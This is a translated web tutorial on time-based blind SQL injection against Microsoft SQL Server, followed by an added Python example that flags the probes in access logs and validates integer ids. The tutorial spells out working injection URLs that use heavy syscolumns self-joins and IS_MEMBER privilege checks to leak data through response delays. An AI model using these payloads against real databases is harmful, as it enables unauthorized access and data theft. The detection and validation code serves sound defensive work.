Timeout-based MSSQL Blind Injection [Network Technology]
Author: night
Source: www.54rk.cn
Suppose there is a page whose content stays exactly the same no matter how you inject into it, yet its code really does contain an injection point:
select * from table where columnid = $input_id
Injecting by way of the page's returned errors is completely out of the question, because the page content is always identical. Vulnerable pages like this certainly exist, and you can construct one yourself.
So how do we inject a column in this situation?
We use time-based blind injection.
First look at two statements:
select * from sysobjects where id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=1
select * from sysobjects where id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=2
The first statement will definitely time out; the page should not return a result within half an hour. The second returns a result immediately.
If your test results differ from what I describe, replace
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6
with
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6.....syscolumns AS sys100
that is, 100 of them in total. If it still does not time out, your computer must be from another planet.
Now suppose the vulnerable page is http://127.0.0.1/xml/mssql/index.asp?id=1
We inject like this:
http://127.0.0.1/xml/mssql/index.asp?id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=1
http://127.0.0.1/xml/mssql/index.asp?id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=2
If the response times differ by a wide margin, there is definitely an injection point. Now let's determine the privileges.
http://127.0.0.1/xml/mssql/index.asp?id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=(SELECT IS_MEMBER('db_owner'))
http://127.0.0.1/xml/mssql/index.asp?id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=(SELECT IS_MEMBER('sysadmin'))
For the remaining injection steps, refer to the other tutorials available online.
You only need to swap out the and 1=(SELECT IS_MEMBER('sysadmin')) condition.
This works because, if your condition is false, the
(SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
check is never entered; if your condition is true, the
(SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
check is evaluated to completion.
So if the page times out, your condition holds and you have guessed the information correctly; if it does not time out, your guessed condition was wrong.
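An added detection and mitigation example in Python, not part of the original article: it scans constructed access-log lines for the heavy syscolumns self-join and IS_MEMBER probes shown above, flags a request whose injected condition held because the response ran past a timeout threshold, and shows the application-side fix for the columnid = $input_id query, which is to accept id only as a plain integer before it reaches SQL. The log format, the 10-second threshold and the response times are assumptions.

```python
import re
from urllib.parse import urlparse, unquote_plus

# Constructed sample access-log lines (assumed format: METHOD PATH?QUERY TIME_TAKEN_MS).
# The URLs mirror the probes in the article; the response times are invented.
SAMPLE_LOG = [
    "GET /xml/mssql/index.asp?id=1 120",
    "GET /xml/mssql/index.asp?id=1+and+(SELECT+count(*)+FROM+syscolumns+AS+sys1,"
    "syscolumns+as+sys2,syscolumns+AS+sys3,syscolumns+AS+sys4,syscolumns+AS+sys5,"
    "syscolumns+AS+sys6)>0+and+1=1 1800000",
    "GET /xml/mssql/index.asp?id=1+and+(SELECT+count(*)+FROM+syscolumns+AS+sys1,"
    "syscolumns+as+sys2,syscolumns+AS+sys3,syscolumns+AS+sys4,syscolumns+AS+sys5,"
    "syscolumns+AS+sys6)>0+and+1=2 95",
    "GET /xml/mssql/index.asp?id=1+and+(SELECT+count(*)+FROM+syscolumns+AS+sys1,"
    "syscolumns+as+sys2,syscolumns+AS+sys3)>0+and+1=(SELECT+IS_MEMBER('sysadmin')) 110",
    "GET /xml/mssql/index.asp?id=42 88",
]

# Repeated self-joins of a catalog view are the signature of the heavy-query timing trick;
# IS_MEMBER(...) inside a parameter is the privilege probe from the article.
SELF_JOIN = re.compile(r"\bsyscolumns\s+as\s+sys\d+\b", re.IGNORECASE)
PRIV_PROBE = re.compile(r"\bIS_MEMBER\s*\(", re.IGNORECASE)
SLOW_MS = 10_000  # assumed threshold, far above this page's normal latency

def classify_request(line):
    """Findings for one log line; an empty list means nothing suspicious."""
    _method, path, ms = line.split()
    query = unquote_plus(urlparse(path).query)  # '+' becomes a space, as the server sees it
    joins = len(SELF_JOIN.findall(query))
    findings = []
    if joins >= 2:
        findings.append(f"heavy-query self-join x{joins}")
    if PRIV_PROBE.search(query):
        findings.append("IS_MEMBER privilege probe")
    if joins >= 2 and int(ms) > SLOW_MS:
        # The request hung, so the injected condition was true and one bit of data leaked.
        findings.append("timed out: injected condition held")
    return findings

def validate_id(raw):
    """Application-side fix for 'columnid = $input_id': accept only a plain integer,
    then bind it as a query parameter instead of concatenating it into the SQL text."""
    if not re.fullmatch(r"\d{1,9}", raw.strip()):
        raise ValueError("id must be a plain integer")
    return int(raw)
```

A request carrying the self-join pattern is worth alerting on even when it returns fast, since the fast responses are the "condition false" half of the same probe.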
---------- I published this article a long time ago, but nobody has given me any feedback. I wrote it last year, and up to this year there has been no response at all; I don't even know whether it contains mistakes.